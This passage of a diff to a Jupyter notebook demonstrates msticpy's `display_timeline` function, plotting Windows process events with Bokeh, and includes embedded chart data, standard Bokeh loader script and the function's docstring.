Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\"],\"TimeGenerated\":{\"__ndarray__\":\"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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[363]},\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362],\"y_index\":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]},\"selected\":{\"id\":\"1084\"},\"selection_policy\":{\"id\":\"1085\"}},\"id\":\"1003\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1054\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1105\",\"type\":\"DaysTicker\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"tooltips\":[[\"NewProcessName\",\"@NewProcessName\"],[\"CommandLine\",\"@CommandLine\"],[\"EventID\",\"@EventID\"],[\"TimeGenerated\",\"@TimeGenerated{%F %T.%3N}\"]]},\"id\":\"1004\",\"type\":\"HoverTool\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"1029\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1091\",\"type\":\"DaysTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"1003\"},\"glyph\":{\"id\":\"1069\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1070\"},\"view\":{\"id\":\"1072\"}},\"id\":\"1071\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":\"10px\"},\"id\":\"1053\",\"type\":\"Title\"},{\"attributes\":{\"end\":1547530487011.5,\"start\":1547525104998.5},\"id\":\"1040\",\"type\":\"Range1d\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1092\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1081\",\"type\":\"AllLabels\"},{\"attributes\":{\"axis\":{\"id\":\"1020\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"1023\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1078\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1084\",\"type\":\"Selection\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1094\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"1038\",\"type\":\"Title\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1058\",\"type\":\"Circle\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1107\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1076\",\"type\":\"AllLabels\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1095\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1108\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1044\",\"type\":\"LinearScale\"},{\"attributes\":{\"fill_color\":{\"value\":\"navy\"},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1057\",\"type\":\"Circle\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"1062\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"source\":{\"id\":\"1003\"}},\"id\":\"1060\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1014\",\"type\":\"LinearScale\"},{\"attributes\":{\"data_source\":{\"id\":\"1003\"},\"glyph\":{\"id\":\"1057\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1058\"},\"view\":{\"id\":\"1060\"}},\"id\":\"1059\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"navy\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1069\",\"type\":\"Scatter\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1109\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"source\":{\"id\":\"1003\"}},\"id\":\"1072\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1012\",\"type\":\"LinearScale\"}],\"root_ids\":[\"1073\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"bbc6fdf4-d0af-4eda-8c71-7e077d61546d\",\"root_ids\":[\"1073\"],\"roots\":{\"1073\":\"30b23de7-4b30-4a44-aa32-1afc73ae91df\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1073"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.models.layouts.Column\">Column</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'1073', <span id=\"1297\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">children&nbsp;=&nbsp;[Figure(id='1005', ...), Figure(id='1037', ...)],</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;None,</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">rows&nbsp;=&nbsp;'auto',</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">spacing&nbsp;=&nbsp;0,</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;None,</div></div><div class=\"1296\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto')</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"1297\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"1296\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ],
+      "text/plain": [
+       "Column(id='1073', ...)"
+      ]
+     },
+     "execution_count": 2,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "processes_on_host = pd.read_csv(\r\n",
+    "    \"data/processes_on_host.csv\",\r\n",
+    "    parse_dates=[\"TimeGenerated\"],\r\n",
+    "    infer_datetime_format=True,\r\n",
+    "    index_col=0\r\n",
+    ");\r\n",
+    "\r\n",
+    "# At a minimum we need to pass a dataframe with timestamp column\r\n",
+    "# (defaults to TimeGenerated)\r\n",
+    "display_timeline(processes_on_host)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "The Bokeh graph is interactive and has the following features:\n",
+    "- Tooltip display for each event marker as you hover over it\n",
+    "- Toolbar with the following tools (most are toggles enabling or disabling the tool):\n",
+    "  - Panning \n",
+    "  - Select zoom\n",
+    "  - Mouse wheel zoom\n",
+    "  - Reset to default view\n",
+    "  - Save image to PNG\n",
+    "  - Hover tool\n",
+    "  \n",
+    "Additionally an interactive timeline navigation bar is displayed below the main graph. You can change the timespan shown on the main graph by dragging or resizing the selected area on this navigation bar.\n",
+    "\n",
+    "**Note**: \n",
+    "- the tooltips work on the Windows process data shown above because of a legacy fallback built into the code.\n",
+    "  Usually you   need to specify the `source_columns` parameter explicitly to have \n",
+    "  the hover tooltips populated correctly."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## More Advanced Timelines\r\n",
+    "`display_timeline` also takes a number of optional parameters that give you more flexibility to show multiple data series and change the way the graph appears.\r\n",
+    "\r\n",
+    "The majority of these parameters are optional so don't be too overwhelmed by them."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Help on function display_timeline in module msticpy.nbtools.timeline:\n",
+      "\n",
+      "display_timeline(data: Union[pandas.core.frame.DataFrame, dict], time_column: str = 'TimeGenerated', source_columns: list = None, **kwargs) -> bokeh.models.layouts.LayoutDOM\n",
+      "    Display a timeline of events.\n",
+      "    \n",
+      "    Parameters\n",
+      "    ----------\n",
+      "    data : Union[dict, pd.DataFrame]\n",
+      "        Either\n",
+      "        dict of data sets to plot on the timeline with the following structure::\n",
+      "    \n",
+      "            Key (str) - Name of data set to be displayed in legend\n",
+      "            Value (Dict[str, Any]) - containing:\n",
+      "                data (pd.DataFrame) - Data to plot\n",
+      "                time_column (str, optional) - Name of the timestamp column\n",
+      "                source_columns (list[str], optional) - source columns to use\n",
+      "                    in tooltips\n",
+      "                color (str, optional) - color of datapoints for this data\n",
+      "            If any of the last values are omitted, they default to the values\n",
+      "            supplied as parameters to the function (see below)\n",
+      "    \n",
+      "        Or\n",
+      "        DataFrame as a single data set or grouped into individual\n",
+      "        plot series using the `group_by` parameter\n",
+      "    time_column : str, optional\n",
+      "        Name of the timestamp column\n",
+      "        (the default is 'TimeGenerated')\n",
+      "    source_columns : list, optional\n",
+      "        List of default source columns to use in tooltips\n",
+      "        (the default is None)\n",
+      "    \n",
+      "    Other Parameters\n",
+      "    ----------------\n",
+      "    title : str, optional\n",
+      "        Title to display (the default is None)\n",
+      "    alert : SecurityAlert, optional\n",
+      "        Add a reference line/label using the alert time (the default is None)\n",
+      "    ref_event : Any, optional\n",
+      "        Add a reference line/label using the alert time (the default is None)\n",
+      "    ref_time : datetime, optional\n",
+      "        Add a reference line/label using `ref_time` (the default is None)\n",
+      "    group_by : str\n",
+      "        (where `data` is a DataFrame)\n",
+      "        The column to group timelines on\n",
+      "    legend: str, optional\n",
+      "        \"left\", \"right\", \"inline\" or \"none\"\n",
+      "        (the default is to show a legend when plotting multiple series\n",
+      "        and not to show one when plotting a single series)\n",
+      "    yaxis : bool, optional\n",
+      "        Whether to show the yaxis and labels (default is False)\n",
+      "    ygrid : bool, optional\n",
+      "        Whether to show the yaxis grid (default is False)\n",
+      "    xgrid : bool, optional\n",
+      "        Whether to show the xaxis grid (default is True)\n",
+      "    range_tool : bool, optional\n",
+      "        Show the the range slider tool (default is True)\n",
+      "    height : int, optional\n",
+      "        The height of the plot figure\n",
+      "        (the default is auto-calculated height)\n",
+      "    width : int, optional\n",
+      "        The width of the plot figure (the default is 900)\n",
+      "    color : str\n",
+      "        Default series color (default is \"navy\")\n",
+      "    overlay_data : pd.DataFrame:\n",
+      "        A second dataframe to plot as a different series.\n",
+      "    overlay_color : str\n",
+      "        Overlay series color (default is \"green\")\n",
+      "    hide : bool, optional\n",
+      "        If True, create but do not display the plot.\n",
+      "        By default, False.\n",
+      "    ref_events : pd.DataFrame, optional\n",
+      "        Add references line/label using the event times in the dataframe.\n",
+      "        (the default is None)\n",
+      "    ref_time_col : str, optional\n",
+      "        Add references line/label using the this column in `ref_events`\n",
+      "        for the time value (x-axis).\n",
+      "        (this defaults the value of the `time_column` parameter or 'TimeGenerated'\n",
+      "        `time_column` is None)\n",
+      "    ref_col : str, optional\n",
+      "        The column name to use for the label from `ref_events`\n",
+      "        (the default is None)\n",
+      "    ref_times : List[Tuple[datetime, str]], optional\n",
+      "        Add one or more reference line/label using (the default is None)\n",
+      "    \n",
+      "    Returns\n",
+      "    -------\n",
+      "    LayoutDOM\n",
+      "        The bokeh plot figure.\n",
+      "\n"
+     ]
+    }
+   ],
+   "source": [
+    "help(display_timeline)\r\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Grouping Series From a Single DataFrame\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-01-30T20:46:29.051830Z",
+     "start_time": "2020-01-30T20:46:28.958882Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1298\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || 